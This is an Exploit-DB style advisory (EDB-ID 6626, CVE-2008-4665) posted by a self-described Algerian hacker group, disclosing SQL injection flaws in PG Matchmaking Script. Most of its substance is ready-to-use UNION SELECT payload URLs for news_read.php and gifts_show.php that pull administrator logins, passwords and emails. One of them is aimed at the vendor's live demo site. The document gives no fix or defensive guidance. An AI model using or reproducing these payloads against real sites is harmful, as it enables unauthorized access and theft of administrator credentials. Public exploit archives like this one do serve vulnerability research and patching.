Exploit PG Matchmaking Script - Multiple SQL Injections

[Exploiter]

EDB-ID

6626

Проверка EDB

1. Пройдено

Автор

SUPER CRISTAL

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2008-4665

Дата публикации

2008-09-29

==================================================================================================================
          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=           PG Matchmaking Script  Multiple  Remote SQL Injection Vulnerability                                        +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =           Discovered By: Super Cristal  :::ALGERIAN HaCkEr:::         =     =   
                =                                                                                    =
                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
                =                                                                                    =
                =      =               :::::Mail: Super_Cristal@hotmail.com:::::::             =     =
                =                                                                                    =
                =        = ::::script Demo: http://www.datingpro.com/matchmaking/demo::::=         =
                =                                                                                    =
                ======================================Super Cristal===================================
#product home: datingpro.com                                                      
#dork:find it

Exploit(1):
********
http://localhost/[script_path]/news_read.php?id=-20 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5 FROM ADMINS--
Exploit(2):
http://localhost/[script_path]/gifts_show.php?id=-101 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5,6,7 FROM ADMINS--
               
demo::::
http://www.datingpro.com/matchmaking/demo/news_read.php?id=-20 UNION SELECT 1,concat_ws(0x3e,Login,Password,EMail),3,4,5 FROM ADMINS--

                                
                                                    

===================================================================================================================

Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALL www.Snakespc.com/SC >>>> Members 

===================================================================================================================
                                  
                                                          ::::Super_Cristal@Hotmail.CoM::::

# milw0rm.com [2008-09-29]